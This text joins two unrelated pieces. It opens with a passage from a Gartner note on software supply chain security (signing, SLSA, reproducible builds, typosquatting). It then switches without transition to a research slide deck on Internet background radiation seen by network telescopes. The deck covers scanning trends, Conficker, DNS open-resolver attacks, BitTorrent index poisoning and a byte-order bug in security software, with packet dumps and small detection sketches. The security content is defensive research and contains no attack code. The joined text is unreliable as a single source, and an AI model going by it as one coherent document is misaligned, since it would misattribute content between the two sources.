artifacts, their origins, vulnerabilities, dependencies, etc. that make up the code-to-container
supply chain.
Kritis is a Kubernetes admission controller that runs policy checks defined by the Kubernetes
cluster admin, at runtime and then either approves or denies the pod to be launched — based on
vulnerabilities in the image or if the image is not obtained from a trusted source.
Kritis Signer is a command-line tool that creates attestations for a container image.
Cosign signs container images. Cosign is developed as part of the sigstore project hosted by the
Linux Foundation. The goal of sigstore is to ease the adoption of signing software artifacts.
Note 3: Tracking Open-Source Dependency Chains
Open Source Insights shows information about a package without requiring users to install the
package first. Developers can see what installing a package means for their project, how popular
it is, find links to source code, and then decide whether it should be installed.
OSSF Scorecard is a tool that helps evaluate security posture of OSS projects.
Supply chain Levels for Software Artifacts (SLSA, pronounced “salsa”), an end-to-end framework
for ensuring the integrity of software artifacts throughout the software supply chain. It is inspired
by Google’s internal “Binary Authorization for Borg” and secures all of Google’s production
workloads.
Note 4: Reproducible Builds
The motivation behind the Reproducible Builds project is to allow verification that no
vulnerabilities or backdoors have been introduced during the compilation process. Tools such as
diffoscope help compare files, directories and identify what makes them different. It can
compare jars, tarballs, ISO images, or PDFs.
Three guiding principles underpin the idea of reproducible builds:
■ Deterministic builds: A given source must always yield the same output.
■ Hardened build tools: The tools in the build pipeline are hardened and immutable.
■ Verifiable output: Ability to detect and fix the discrepancy between expected and actual builds.
Note 5: Package Typosquatting Supply Chain Attacks
Typosquatting is a type of software supply chain attack where the attacker tries to mimic the
name of an existing package in a public registry hoping that developers will accidentally
download the malicious package instead of the legitimate one. An npm package (loadsh) was
typosquatting the popular lodash package using the transposition of the “a” and “d” characters.
See this whitepaper for more details: SpellBound: Defending Against Package Typosquatting. Using artifact registries, software composition analysis and code scanning reduces the risk from package typosquatting attacks on public repositories.
As noted in the 2020 State of the Software Supply Chain Report 2 by Sonatype, “Bad actors are no
longer waiting for public vulnerability disclosures. Instead, they are taking the initiative and actively
injecting malicious code into open-source projects that feed the global supply chain. By shifting
their focus “upstream,” bad actors can infect a single component, which will then be distributed
“downstream” using legitimate software workflows and update mechanisms.”
ReversingLabs revealed over 700 malicious gems (packages written in Ruby programming
language) being distributed through the RubyGems repository. Twelve Python libraries uploaded
on the official Python Package Index (PyPI) contained malicious code. In Jan 2021, Sonatype
discovered three malicious packages that were published to npm repository, all of which
leveraged brandjacking and typosquatting techniques.
Note 6: Frameworks and Standards for Evaluating Supply Chain
Security
Evaluating Your Supply Chain Security — a Checklist by Cloud Native Computing Foundation
(CNCF)
NIST Secure Software Development Framework
NIST, Security and Privacy Controls for Information Systems and Organizations
UL 2900 for IoT Certification
ISO/IEC 27034
Note 7: Sample Hashing and Signing Tools
Visual Studio — Hashing Source Code Files with Visual Studio to Assure File Integrity
GaraSign For Code Signing
© 2022 Gartner, Inc. and/or its affiliates. All rights reserved. Gartner is a registered trademark of Gartner, Inc.
and its affiliates. This publication may not be reproduced or distributed in any form without Gartner's prior
written permission. It consists of the opinions of Gartner's research organization, which should not be
construed as statements of fact. While the information contained in this publication has been obtained from
sources believed to be reliable, Gartner disclaims all warranties as to the accuracy, completeness or adequacy
of such information. Although Gartner research may address legal and financial issues, Gartner does not
provide legal or investment advice and its research should not be construed or used as such. Your access and
use of this publication are governed by Gartner’s Usage Policy. Gartner prides itself on its reputation for
independence and objectivity. Its research is produced independently by its research organization without input
or influence from any third party. For further information, see "Guiding Principles on Independence and
Objectivity."
Examining the Internet’s Pollution!
Karyn Benson!
[email protected]!
https://www.reddit.com/r/AskReddit/comments/2pjsf9/garbage_men_of_reddit_whats_the_most_illegal/
http://www.owensworld.com/funny-pictures/vehicles/2-cars-dumpster
People throw out interesting and valuable items
This talk: what sort of interesting and valuable information can we find in the Internet’s “trash?”
About me
• I studied Internet “trash” for the last 4 years of my PhD
• Before grad school: wrote intrusion detection software
Outline
• What is Internet “trash?”
• How can we collect “trash?”
• Data for this presentation
• Interesting and valuable items found in “trash”
• Conclusion
What is Internet “trash?”
• Unsolicited packets
• Passively captured
• Also called Internet Background Radiation (IBR)
Traffic: Scanning
• Searching for hosts that run a service
Traffic: Backscatter
• Host responds to forged packets
[Diagram: the attacker (7.7.7.7) sends "From: 1.2.3.4 To: 3.3.3.3 SYN" to the victim (3.3.3.3); the victim replies "From: 3.3.3.3 To: 1.2.3.4 SYN-ACK", so the backscatter lands at 1.2.3.4]
Traffic: Misconfiguration
• Host erroneously believes that a machine is hosting a service
[Diagram: DNS server list 5.5.5.5, 6.6.6.6, with 1.2.3.4 marked with an X]
Traffic: Bugs
• Software errors cause packets to reach unintended destinations
[Diagram: a host configured with DNS server 4.3.2.1 sends "To: 1.2.3.4 DNS Query" (note the reversed octets)]
Traffic: Spoofed
• Hosts forge their IP address to make it appear as though it originates from a different source
[Diagram: host 3.3.3.3 sends "From: 2.2.2.2 To: 1.2.3.4 SYN"]
Traffic: Unknown
• Traffic produced for an unknown purpose
• TCP SYN to non-standard port
• Encrypted UDP packets
• UDP with unknown payload
6:00:06.000065 IP 111.248.55.49.51956 > 1.16.56.246.7605: UDP, length 19
0x0000: 4500 002f 6c48 0000 7011 ---- 6ff8 3731 E../lH..p..Fo.71
0x0010: 0110 38f6 caf4 1db5 001b 8298 7133 0f00 ,.8.........q3..
0x0020: 643e c2d4 2cf5 42b5 810f 7f01 5344 1e d>..,.B.....SD.
How can we collect “trash?”
How to collect unsolicited traffic
• Honeypots: Setting up machines that are purposefully infected with malware
[Diagram: honeypot at 1.0.0.0]
How to collect unsolicited traffic
• One-way traffic: Record any packet without a response
[Diagram: hosts 1.0.0.0, 1.0.0.4, 1.0.0.33, 1.0.0.97, 1.0.0.133, 1.0.0.208 in BGP-announced 1.0.0.0/24]
Destination: any without response -> Rule: write packet to storage
How to collect unsolicited traffic
• Greynet: Record traffic destined to any unused IP address
[Diagram: live hosts 1.0.0.0, 1.0.0.4, 1.0.0.33, 1.0.0.97, 1.0.0.133, 1.0.0.208 in BGP-announced 1.0.0.0/24]
Destination 1.0.0.[0,4,33,97,133,208] -> route to destination; all others in 1.0.0.0/24 -> write packet to storage
How to collect unsolicited traffic
• Covering prefix: Record any packet destined to an unused subnet
[Diagram: live hosts 1.0.0.1, 1.0.0.9, 1.0.0.17, 1.0.0.31, 1.0.0.63, 1.0.0.127 in BGP-announced 1.0.0.0/24]
Destination 1.0.0.0/25 -> route to destination; 1.0.0.128/25 -> write packet to storage
How to collect unsolicited traffic
• Network telescope: Announce unused addresses and record all traffic
[Diagram: BGP-announced 1.0.0.0/24; destination 1.0.0.0/24 -> write packet to storage]
We use network telescopes to easily study macroscopic behaviors
[Chart comparing honeynets, one-way traffic collection, greynets, covering prefixes and network telescopes]
Pros: ease of implementation, fewer privacy concerns, scalability
Cons: lack of in-depth details, avoidability
Data used in this presentation
Our method of obtaining “trash”: Network telescopes
• Multiple large (academic) network telescopes
• Currently capturing ~5TB compressed pcap per week
• Historical: traffic since 2008
[Diagram: scanning, misconfigured, buggy or under-attack hosts send packets to the telescope]
IBR is pervasive: We observe traffic from many diverse sources
• Removed spoofed traffic. Method: [CCR '13]
Total (~July 2013) | Percent of BGP announced:
IP addresses: 133M | 5%
/24 blocks: 3.15M | 30%
Prefixes: 205k | 45%
ASes: 24.2k | 54%
Countries: 233 | 99%
IBR is persistent: We observe a large number of sources over time
• Removed spoofed traffic. Method: [CCR '13]
[Time-series figure; annotation: Spamhaus attack]
Interesting and valuable items found in Internet “trash”
Network telescopes capture a wealth of security-related data
• Scanning: Trends and relation to vulnerability announcements
• Backscatter: Attacks on authoritative name servers
• Misconfigurations: BitTorrent index poisoning attacks
• Bugs: Byte order bug in security software
• Unknown: Encryption vs. obfuscation
Scanning: Trends and relation to vulnerability announcements
Methodology
• Used Bro’s parameters (sketched below): an IP is considered a scanner if it sends:
• Packets to 25 different network telescope IP addresses
• Same protocol/port
• Within 5 minutes
• Results depend on size of network telescope
• Doesn’t capture super stealthy scanners (e.g., [Dainotti et al. IMC ’12])
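A sketch of that windowed heuristic over (timestamp, src, dst, proto, dport) tuples (my simplification; Bro/Zeek's real scan detector does more):

from collections import defaultdict

WINDOW = 300       # 5 minutes, in seconds
THRESHOLD = 25     # distinct telescope IPs

seen = defaultdict(list)   # (src, proto, dport) -> [(timestamp, dst), ...]

def is_scanner(ts, src, dst, proto, dport):
    key = (src, proto, dport)
    hits = [(t, d) for (t, d) in seen[key] if ts - t <= WINDOW]
    hits.append((ts, dst))
    seen[key] = hits
    return len({d for _, d in hits}) >= THRESHOLD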
Scanning: 2008-2012
• Conficker dominates
[Time-series figure of packets and IPs; annotation: Conficker outbreak]
How do we know which packets originate from Conficker?
• Bug in PRNG: primarily targets IP addresses {A.B.C.D | B < 128 & D < 128}
• Developed heuristic to identify sources randomly scanning with this bug
• Some evidence of a testing phase prior to discovery
[Time-series figures with missing data marked; "No Conficker expected" vs. "No Conficker observed" around the date Conficker was discovered; first day: 2 IPs in Guangdong Province, China]
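A sketch of testing a source against that PRNG bias (the 99% threshold and minimum packet count are my assumptions, not the talk's exact heuristic):

import ipaddress

def conficker_biased(dst):
    # Conficker's PRNG bug keeps the 2nd and 4th octets below 128
    _, b, _, d = ipaddress.IPv4Address(dst).packed
    return b < 128 and d < 128

def looks_like_conficker(dests, min_packets=50):
    # A uniform random scanner hits biased addresses only ~25% of the time;
    # a source whose targets are (almost) all biased is suspicious
    hits = sum(conficker_biased(x) for x in dests)
    return len(dests) >= min_packets and hits / len(dests) > 0.99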
Scanning Post 2012
• Conficker is dying out
• Port 23 (telnet) is popular
[Time-series figures of packets and IPs; annotation: Carna Botnet]
http://internetcensus2012.bitbucket.org/paper.html
Scanning Post 2012: Scans of TCP/443 following the Heartbleed vulnerability announcement
Scanning Post 2012: Scans of TCP/5000 prior to the Akamai report of UPnP devices used in DDoS attacks
https://www.akamai.com/us/en/about/news/press/2014-press/akamai-warns-of-upnp-devices-used-in-ddos-attacks.jsp
Backscatter: Attacks on authoritative name servers
Reference: https://www.nanog.org/sites/default/files/nanog63-dnstrack-vannice-ddos.pdf
Preventing access to websites via attacks on authoritative name servers
[Diagram: legitimate host -> (1) DNS query -> DNS server -> (2) recursive DNS query -> authoritative NS -> (3) response to recursive DNS query -> (4) DNS response -> host -> (5) HTTP GET -> webserver]
Why we see some of these attacks: open resolvers
[Diagram sequence: a spoofer (5.6.7.8) sends "From: 1.2.3.4 DNS Query" to an open resolver; the open resolver issues a recursive DNS query to the authoritative NS and receives the response; it then sends "To: 1.2.3.4 DNS Response", so the answer lands at 1.2.3.4]
We infer more open resolvers as a result of an increase in DNS traffic
• Very few open resolvers before Jan 29, 2014; the same open resolvers are used
IPs observed: IBR ~July 2013: 3.4k | IBR ~Feb. 2014: 1.56M
But the number of open resolvers we see is much less than active probing
IPs observed: IBR ~July 2013: 3.4k | IBR ~Feb. 2014: 1.56M | Open Resolver Project ~Feb. 2014: 37.6M
The open resolvers we observe are used in DoS attacks... and it's working
IPs | OPCODE: OK | OPCODE: SERVFAIL
IBR ~July 2013: 3.4k | 3.0k | 148
IBR ~Feb. 2014: 1.56M | 1.44M | 1.45M (high number of errors: a problem with the authoritative NS)
Open Resolver Project ~Feb. 2014: 37.6M | 32.6M | 0.92M (low number of errors)
Queried domains
• First day: queries for baidu.com --- likely testing phase
• Data from first month of activity. We still observe the attack.
020sf.com 024web.net 027dz.com 028xkj.com 029sms.com 02gd.com 0319pk.com 03lcq.com 052000.com 0538hj.com 0571video.com 059sem.com
0769cg.com 0769ff.com 08ws.com 111da.com 1188008.com 1234176.com 139hg.com 167uc.com 16888china.com 173pk.com 176cc.com 176dd.com
176gj.com 176kw.com 176l.com 176mm.com 176xq.com 17c.cc 180xp.com 184sf.com 185jxcq.com 191cq.com 19jy.com 201314baidu.com 202aaa.com
236899.com 24ribi.com 250hj.com 266mi.com 269sf.com 2kkx.com 3000sy.com 300eeee.com 300llll.com 300ssss.com 303aaa.com 303bbb.com 30gg.com
316ms.com 321xy.com 360362.com 365ddos.cn 369df.com 38db.com 38za.com 3gabn.com 3kkx.com 3q518.com 3t33.com 4000123046.com 40cqcq.com
442ko.com 4z1s.info 500sf.com 512312.com 513wt.com 515kkk.com 51aidi.com 51rebeng.com 51yjzs.com 520898.com 520sfyx.com 525mk.com 52ccx.com
52ssff.com 531gou.com 555fz.com 567uu.com 56bj56.com 5ipop.net 5kkx.com 600dddd.com 60sf.com 616162.com 63fy.com 666hf.com 68yb.com 6ee.com
6g5b.info 6kkx.com 6ksf.com 700rrrr.com 72play.com 72sm.com 74486.com 76489.com 766mi.com 767hh.com 76wzw.com 76yxw.com 775gg.com
778ff.com 787ok.com 799mi.com 7afa.com 7s7ss.com 800liao.net 800nnnn.com 800oooo.com 800uuuu.com 815quan.com 81hn.com 81ypf.com 82hf.com
83uc.cn 83wy.com 84822258.com 85191.com 87145.com 87xn.com 885jj.com 886pk.com 8885ok.com 900eeee.com 909kkk.com 910pk.com 911aiai.com
911gan.com 911ii.com 911mimi.com 911sepian.com 911xi.com 911xu.com 911yinyin.com 915hao.com 919uc.com 926.com 92xiaobao.com 933fg.com
940945.net 97pc.net 980311.net 981118.com 98989833.com 991816.com 998.co 999qp.net 99hcq.com 99ktw.com 99mzi.com 99ting.com 99wf.com
9aq.com 9kanwo.com 9kf.com 9zny.com a6c5.com akadns.net aliyuncs.com amdxy.com appledaily.com.hk appledaily.com.tw arx888.com asxkmy.com
atnext.com aws520.com b166.com badong123.com bbidda.com bbjck.com bbs117.com bdaudi.com bdhope.com betboy.cc betboy.hk betboy.tw
bettykid.com bjts168.com boeeo.com booooook.com bw176.com byfire.net cc176.com cck168.com ccskys.com cd519.com cdhydq.com cdjbg.com
cdxgy.com cg1314.com cgxin.com chinahjfu.com chuansf-1.com chuansf.com ck1997.com clntwr.com cm0556.com cn191.com cn948.com comedc.com
cp375.com cq520.com cqqhjgj.com cs912.com ct0553.com ct176.com ctysy.com cxmyy.com dama2.com daqinyy.com disshow.com dmmjj.com dnsabc.com
dt176.com dudu176.com dw173.com dytt8.net e0993.com e5e566.com edgesuite.net faahaa.com fen-sen.com fg9999.com fjhzw.com fu180.com furen88.net
fw10000.com fzl4.com gbdzd.com gegegan1.com gegequ.com go176.com gotocdn.com guangyuchina.com gx911.com h5acg.com had1314.com
hao9458.com haocq99.com haosf3165.com haosf86.net hcemba.com hcq180.com hcq99.com hcqmir.com he09.com heblq.com henhenlu.com hf600.cn
hi0762.com hi182.com hj19.com hj321.com hkdns-vip.com hl176.com hlm53.com hn179.com hnart123.com hndc114.com hqsy120.com hscmis.com
htbdcn.com huaxia76.com hw166.com hyh588.com hz96.com icheren.net iidns.com iinfobook.net jc0633.com jccjk.com jd176.com jdgaj.com jdlcq.com
jdyyw.com jeeweb.net jf086.com jh219.com jiaduolu.net jiayun588.com jn176.com jrj001.com jshgl.com jt1216.com jx116.com jx8111.com k9080.com
kd5888.com kp811.com kr5b.com kx2014.com laocq.com laocq180.com laosf180.com laowz176.com laoyou999.com lcjba.com lcq170.com liehoo.net
like400.com lmh176.com love303.com lpp176.com lsr176.com luse0.com luse1.com luse2.com luse3.com luse4.com luse5.com luse6.com luse7.com
luse8.com luse9.com lwfb800.com lxt998.com lygfp.com lyxyqp.com lz9999.com m2bd.pw m3088tv.com manyefs.com mir108.com mir1860.com mir86.com
miryy.com mly555.com mm5ii.com ncmir.com net0335.com nextmedia.com nnlrw.com onaccr-cn.com p0757.com pao176.com ph268.com pk8558.com
pksf08.com puhup.com purednsd.com purevm.com px518.com q1.com qfqcc.com qhdflkmc.com qianliri.com qingfeng180.com quanben.com qy176.com
rp1704.com rq180.com s6s5.com salangane-books.com scktsj.com sdcsnk.com sdjlh.com seluoluo2.com seluoluo3.com seoeee.com sf117.com sf123.com
sf665.com sf717.com sg500.com sh1099.com sheshows.com sinaapp.com skcq.net sl139.com sp176.com ssthjy.com sytcqy.com szchscm.com
tangdefenghuang.com tg180.com tianmao76.com tjldktv.com txj880.com tz176.com vip78.cn w78z.com w8best.com wan26.com wancantao.net
wanfuyou.com wb123.com wfbaby.net wn176.com wotebang.com wsn88.com wy176.com wyb.name wysss.com wz.com x5wb.com x7car.com x7ok.com
xhzssj.com xia00.com xiaolongcq.com xiaoyx123.com xie139.com xin2003.com xjliuxue.cn xtj123.com xx2pp.com xxxoooo.com xxyl100.com yeyelu0.com
yeyelu9.com yg521.com yh996.com yifeng2012.com yinquanxuan.com youcai667.com ysbxw.com yshqq.com ysmir.cn ytwtoys.com ytz4.info
yuhuakonggu.com yw110.com yw119.com yx5881.com yy188.com yy698.com yzrjy.com yzypp.com zbtlw.com zc911.com zgtx168.com zhao106.com
zhaoil.com zhaoqjs.com zhizunfugu.com zinearts.com zongzi0898.com zst0510.com zuyu1.com zxj02.com zxw198.com 052000.com 422.ko.com 51pop.net
5rxe.info 999.net.ru baidu.com bb0575.com gb41.com geigan.org lhy716.com sz-xldrhy.com wgduznyw.ga wo135.com. zbtlw.com. zgvqtnrc.ga
Example Registration Info:
Domain Name: 029sms.com
...
Updated Date: 2014-02-14 14:55:38
Creation Date: 2014-02-14 14:55:38
...
Registrant Street: hkjhkjhjkhjk
Registrant City: Beijing Shi
Registrant State/Province: Beijing Shi
Registrant Postal Code: 333333
Registrant Country: China
Registrant Phone: 11111111
Registrant Phone Ext:
Registrant Fax: 11111111
Misconfigurations: BitTorrent index poisoning attacks
BitTorrent index poisoning attacks induce many hosts to send IBR
• Index poisoning: purposefully inserting fake information into the DHT
[Diagram: a peer asks the BitTorrent DHT "Where can I get a torrent?"; the poisoned DHT answers "Torrent Location: 1.2.3.4"]
Popular Torrents in IBR - July 2012 (hash | torrent | packets)
48484fab5754055fc530fcb5de5564651c4ef28f | Grand Theft Auto - Chinatown Wars | 450k
5b5e1ffa9390fff13f4af2aef9f5861c4fbf46eb | Modern Family S3E22 | 398k
d90c1110a5812d9a4bf3c28e279653a5c4f78dd1 | CSI S12E22 | 204k
2ecce214e48feca39e32bb50dfcf8151c1b166cc | Coldplay Ft. Rhianna Princess of China | 187k
79f771ec436f09982fc345015fa1c1d0d8c38b48 | ??? | 129k
b9be9fc1db584145407422b0907d6a09b734a206 | Parks and Recreation S4E22 | 127k
99a837efde41d35c283e2d9d7e0a1d4a7cd996dd | Missing 2012 S1E9 | 106k
7b05b6b6db6c66e7bb8fa5aa70a185c7cfcd3d07 | ??? | 104k
c0841cf3196a83d1d08ae4a9eaf10fcfc6c7ba66 | Big Trouble Little China | 99k
99dfae74641d0ca29ef523860713a6270daefc6e | 36 China Town | 91k
Popular Torrents in IBR - July 2013 (hash | torrent | packets)
f7eb38b830ec749f43cf3df20dbc2bf2c99fad97 | Sette Anni in Tibet | 2,356k
6ec64cb88937418d6af29fca6d017e0c658654b7 | 高清光720P版BD-RMVB.中字 | 912k
f90cb027174c2af3c5b838be09a62ff16d6c2ef5 | 美生灵 TC英中字.rmvb | 845k
fedcf797109c7929558d069602ac6fab0b46e814 | Halo 4 Until Dawn | 735k
3b508d09e9c4677b2f67683a9dde2d5ce0b2aa24 | soh 360 | 580k
1254bb23d1a04447cb67bc0479549a504d083c31 | Her Sweet Hand China Lost Treasure | 539k
48484fab5754055fc530fcb5de5564651c4ef28f | Grand Theft Auto - Chinatown Wars | 489k
b9be9fc1db584145407422b0907d6a09b734a206 | Parks and Rec S4E22 | 482k
93efed3aa07e7523d5c4e42f0257f9aa8d5011c3 | Dajiyun | 431k
039a07b38de4529c477f3b75698937e9c5d4acd6 | ntdvt news | 325k
BitTorrent: Temporal aspect
• Unclear why fewer /24 blocks are observed
• But a paused attack is a possible explanation
[Figure: /24 blocks (from BitTorrent) per hour, 2012]
BitTorrent: Spatial aspect
• /24 blocks sending BitTorrent KRPC packets are more likely to be observed by certain destination IPs and ports
• get_peers and find_node packets: certain IP addresses are more likely to be targeted: {X.B.C.D | B & 0x88 = 0x00 and D & 0x09 = 0x01}
• A bug in the PRNG for generating IP addresses is a plausible explanation
July 2015: Huge increase in BitTorrent traffic
• Graph: BitTorrent KRPC packets
• Increase is caused by traffic destined to 1 IP => traffic from over 3.7M /24s per month
• Still going on... not sure of all the details yet
Investigating July 2015 increase in BitTorrent IBR
• Installed two BitTorrent clients on one machine (uTorrent, Deluged)
• Just joined the DHT; didn't download any torrents
• ~2.5 months: Nov. 15 2015 - Jan. 28 2016
• uTorrent: 12 IPs sent 112 packets to a network telescope IP
• Deluged: 51 IPs sent 64 packets to a network telescope IP
• Who directed us to the network telescope?
• LibTorrent most popular client, but not used exclusively
• China most popular geolocation, but not exclusively
Suspicious BitTorrent behavior
• Most IDs associated with the network telescope IP have their third byte equal to 0x04
• Other IP addresses in response packets occur frequently and have third-byte quirks
Sample node IDs
b8:1d:04:ef:96:18:e4:20:6b:c2:8d:1a:31:af:de:7a:81:66:02:56
bd:23:04:04:e9:5e:f5:a0:10:08:06:95:a3:ab:93:c7:74:f5:a6:58
52:b1:04:09:49:b4:91:f8:38:e6:c5:06:38:8d:04:8a:50:99:3f:50
05:b5:04:7e:6a:b8:96:1a:35:07:4e:ae:3e:d3:41:21:95:45:a8:81
13:28:04:d6:d3:2d:db:c5:07:79:7e:14:27:09:e1:37:e7:7e:25:2f
13:28:04:a9:5c:2d:82:2f:78:65:54:13:04:6d:b4:10:72:57:8d:5d
Other IP | Packets | 3rd byte
157.144.153.163 | 76 from 6 IPs | 0x05
177.123.230.26 | 55 from 7 IPs | 0x00
212.246.161.63 | 64 from 7 IPs | 0x06
217.123.247.72 | 87 from 4 IPs | 0x03
27.171.198.228 | 55 from 8 IPs | 0x07
90.122.90.178 | 4 from 3 IPs | 0x01
Bugs: Byte order bug in security software
How many sources send us unsolicited traffic?
[Time-series figure: source IPs per hour, Jan 2008 - Jan 2015; annotations: Conficker outbreak, BitTorrent, ????]
Responsible payload
6:00:00.083796 IP 123.4.253.107.8090 > 1.179.58.115.42501: UDP, length 30
0x0000: 4500 003A DF4B 0000 2E11 ---- 7B04 FD6B E..:.K......{..K
0x0010: 01B3 3A73 1F9A A605 0026 C0CF 0000 0000 ..:S.....&......
0x0020: 0000 0000 3100 3D57 0000 0000 0000 0000 ....1.=W........
0x0030: 0000 0000 287E 02C7 0000
[Payload annotations: fixed bytes, connection ID, random counter]
• 8090 is most popular source port
• 39455 is most popular destination port
Lots of hosts from China (August 2013 data)
Country | IPs | % of BGP-announced address space
China | 101M | 36.26%
Taiwan | 505k | 1.45%
Malaysia | 442k | 7.65%
USA | 324k | 0.03%
Hong Kong | 280k | 2.75%
Japan | 186k | 0.11%
Canada | 129k | 0.26%
Thailand | 126k | 1.55%
Australia | 126k | 0.31%
Singapore | 116k | 2.16%
4 IPs belonging to the CS department!
Monitoring CS department address space
• Capture 1: 36 hours of traffic in/out of CS department for this packet
• CS address space also receives packets
• 3 of 4 IPs from CS observed generating this traffic
• Capture 2: Monitor all traffic to/from these IPs on associated UDP ports
Monitoring CS machines
• Packet 1: CS machines contact a common IP address: tr-b.p.360.cn
• Packet 2: CS machines receive a large packet
04:40:45.211649 IP 180.153.227.168.80 > 2.239.95.102.10102: UDP, length 1044
0x0000: 4500 0430 0100 0000 ed11 ---- b499 e3a8 E..0......L%....
0x0010: 02ef 5f66 0050 2776 041c b5bd 0414 0350 .._f.P'v.......P
0x0020: 2c00 0000 e469 18ad ab70 9e6c dad1 d5fe ,....i...p.l....
0x0030: c1c5 d3f7 e0cc 674d 0000 3200 0001 11d9 ......gM..2.....
0x0040: 0001 07ad 0000 0000 3538 3033 4443 3244 ........5803DC2D
0x0050: 4233 3937 3cf6 1925 1f9a 0044 3146 3443 B397<..%...D1F4C
0x0060: 3732 4334 3039 4232 7756 e0df 1f9a 0044 72C409B2wV.....D
0x0070: 3232 3134 4445 4133 4643 3138 dde8 a6ed 2214DEA3FC18....
0x0080: 6784 0044 3846 3731 4437 4342 3346 3833 g..D8F71D7CB3F83
0x0090: 7146 287a 153d 0144 3131 4545 3334 4443 qF(z.=.D11EE34DC
0x00a0: 4342 3035 718f 4da1 9d41 0144 4239 3631 CB05q.M..A.DB961
0x00b0: 3139 3441 4334 3645 73d7 4fdc 197a 0144 194AC46Es.O..z.D
0x00c0: 3131 3537 3736 3334 3946 4343 da17 0f23 115776349FCC...#
0x00d0: 2711 0144 4345 4539 3242 3938 3131 4639 '..DCEE92B9811F9
0x00e0: b6f7 838b 2774 0144 4146 3546 4639 3333 ....'t.DAF5FF933
0x00f0: 4346 4541 b721 5ba8 2711 0144 3039 3738 CFEA.![.'..D0978
0x0100: 3030 4536 4643 4144 b622 bcb9 ace8 0144 00E6FCAD.".....D
0x0110: 3346 3935 3030 3736 3836 4342 7177 6c38 3F95007686CBqwl8
0x0120: 9e52 0144 3946 3844 3139 3230 3941 4436 .R.D9F8D19209AD6
0x0130: af0c 97d4 0845 0144 3545 4533 3335 4544 .....E.D5EE335ED
0x0140: 4642 4431 1b12 880f 1f9a 0044 3831 4230 FBD1.......D81B0
0x0150: 3542 3634 4441 4333 7075 6774 1f9a 0044 5B64DAC3pugt...D
0x0160: 3643 3146 4535 3832 3033 3330 deb4 5486 6C1FE5820330..T.
0x0170: 271c 0144 4234 4333 3130 4130 3243 3039 '..DB4C310A02C09
0x0180: 6a78 7c09 4f7b 0144 3130 3134 3044 3239 jx|.O{.D10140D29
0x0190: 4537 3234 b623 c1cc 157a 0144 4434 4430 E724.#...z.DD4D0
0x01a0: 3736 3634 4637 3042 0154 cc65 5c7e 0144 7664F70B.T.e\~.D
0x01b0: 4535 4137 3030 4330 3536 4137 6eb5 cd70 E5A700C056A7n..p
0x01c0: 2777 0144 4337 3037 3636 4233 3631 3338 'w.DC70766B36138
0x01d0: 71f9 2724 1f9a 0044 3832 3031 3232 3039 q.'$...D82012209
0x01e0: 3836 3431 dca2 f7ac 1f9a 0044 3941 4244 8641.......D9ABD
0x01f0: 4434 4437 3631 3742 2a5c 039e 0eca 0144 D4D7617B*\.....D
0x0200: 3137 3541 3834 4634 3844 3438 01cd 7bef 175A84F48D48..{.
0x0210: 3b1a 0144 4130 3638 3042 3830 3335 3538 ;..DA0680B803558
0x0220: ab53 1c9e ad82 0144 3841 3043 3430 3939 .S.....D8A0C4099
Monitoring CS machines
• Packets 3-40: CS machines contact sources encoded in the packet
04:40:45.215588 IP 2.239.95.102.10102 > 113.70.40.122.5437: UDP, length 72
0x0000: 4500 0064 536f 0000 3f11 ---- 02ef 5f66 E..dSo..?....._f
0x0010: 7146 287a 2776 153d 0050 1bff 0000 0000 qF(z'v.=.P......
0x0020: f21e 9a42 4103 55e1 0000 0004 0000 0000 ...BA.U.........
0x0030: 0038 0000 0001 0000 0000 0028 e469 18ad .8.........(.i..
0x0040: ab70 9e6c dad1 d5fe c1c5 d3f7 e0cc 674d .p.l..........gM
0x0050: 3336 3050 3030 3638 3531 4534 4230 4442 360P006851E4B0DB
0x0060: 3433 3044 430D
• More packets are exchanged...
• and sometimes there is a byte order bug!
• So 1.2.3.4 receives packets when intended recipient has IP address 4.3.2.1
04:40:46.878016 IP 2.239.95.102.10102 > 122.40.70.113.15637: UDP, length 30
0x0000: 4500 003a 552d 0000 3f11 ---- 02ef 5f66 E..:U-..?....._f
0x0010: 7a28 4671 2776 3d15 0026 2c6b 0000 0000 z(Fq'v=..&,k....
0x0020: 0000 0000 3100 55e1 0000 0000 0000 0000 ....1.U.........
0x0030: 0000 0000 42d6 0005 0000 ....B.....
Monitoring CS machines
04:40:46.877858 IP 113.70.40.122.5437 > 2.239.95.102.10102: UDP, length 30
0x0000: 4500 003a 6213 0000 2f11 ---- 7146 287a E..:b.../...qF(z
0x0010: 02ef 5f66 153d 2776 0026 8a67 0000 0000 .._f.='v.&.g....
0x0020: a800 0d13 2100 55e1 0149 f488 0134 9733 ....!.U..I...4.3
0x0030: 0038 0000 0005 0006 0000 .8........
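The pair of packets above shows the swap concretely: the reply meant for 113.70.40.122 went to 122.40.70.113 instead. A minimal C sketch of how such a bug can arise (an illustration of the effect only, not the vendor's actual code):

#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>

int main(void) {
    struct in_addr peer;
    inet_pton(AF_INET, "113.70.40.122", &peer);  /* wire bytes: 71 46 28 7a */

    /* Bug: byte-swapping an address that is already in network order.
       On a little-endian host this turns 113.70.40.122 into 122.40.70.113. */
    struct in_addr wrong;
    wrong.s_addr = htonl(peer.s_addr);

    char buf[INET_ADDRSTRLEN];
    printf("intended: %s\n", inet_ntop(AF_INET, &peer, buf, sizeof(buf)));
    printf("actual:   %s\n", inet_ntop(AF_INET, &wrong, buf, sizeof(buf)));
    return 0;
}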
What software has this bug?
Qihoo 360
• Verified product usage with CS users
• 360 Total Security Software License and Service
Agreement:
iii) The Upgrade module of the Software uses
peer-to-peer ("P2P") technology to improve
upgrade speed and efficiency of your
bandwidth usage. The P2P technology will
cause data to be uploaded, including program
modules and the Software's malware definition
database, which are used as components of
the Software. Your private data will not be
uploaded.
https://www.360totalsecurity.com/en/license/360-total-security/
Qihoo cleanup
• It took about a month from notification for there to be a significant decrease in packets originating from the bug
[Chart: packet volume over 2015/2016, annotated with "Qihoo notified," "New version on website," and "Probably large update events"]
Network telescopes capture a wealth of security-related data
• Scanning: Trends and relation to vulnerability announcements
• Backscatter: Attacks on authoritative name servers
• Misconfigurations: BitTorrent index poisoning attacks
• Bugs: Byte order bug in security software
• Unknown: Encryption vs. obfuscation
6:00:06.000065 IP 111.248.55.49.51956 > 1.16.56.246.7605: UDP, length 19
0x0000: 4500 002f 6c48 0000 7011 ---- 6ff8 3731 E../lH..p..Fo.71
0x0010: 0110 38f6 caf4 1db5 001b 8298 7133 0f00 ..8.........q3..
0x0020: 643e c2d4 2cf5 42b5 810f 7f01 5344 1e d>..,.B.....SD.
6:00:06.000065 IP 111.248.55.49.51956 > 1.16.56.246.7605: UDP, length 19
